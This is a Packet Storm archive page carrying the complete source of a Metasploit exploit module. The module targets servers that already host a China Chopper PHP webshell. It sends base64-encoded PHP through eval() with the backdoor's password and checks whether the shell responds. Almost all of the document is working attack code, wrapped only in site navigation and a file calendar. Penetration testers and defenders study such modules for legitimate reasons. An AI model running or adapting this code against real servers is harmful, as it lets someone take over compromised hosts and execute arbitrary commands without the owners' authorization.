what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

China Chopper Caidao PHP Backdoor Code Execution

China Chopper Caidao PHP Backdoor Code Execution
Posted Nov 6, 2015
Authored by Nixawk | Site metasploit.com

This Metasploit module takes advantage of the China Chopper Webshell that is commonly used by Chinese hackers.

tags | exploit
SHA-256 | d7fca763cda76a2b27b59c2e2618a505e5099c293f99615ce804976c10da3606

China Chopper Caidao PHP Backdoor Code Execution

Change Mirror Download

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'China Chopper Caidao PHP Backdoor Code Execution',
'Description' => %q{
This module takes advantage of the China Chopper Webshell that is
commonly used by Chinese hackers.
},
'License' => MSF_LICENSE,
'Author' => ['Nixawk'],
'References' =>
[
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Automatic', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 27 2015',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),
OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper'])
], self.class)
end

def http_send_command(code)
code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
"#{datastore['PASSWORD']}" => code
}
})
end

def check
flag = Rex::Text.rand_text_alpha(16)
res = http_send_command("printf(\"#{flag}\");")
if res && res.body =~ /#{flag}/m
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end

def exploit
print_status("#{peer} - Sending exploit...")
http_send_command(payload.raw)
end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close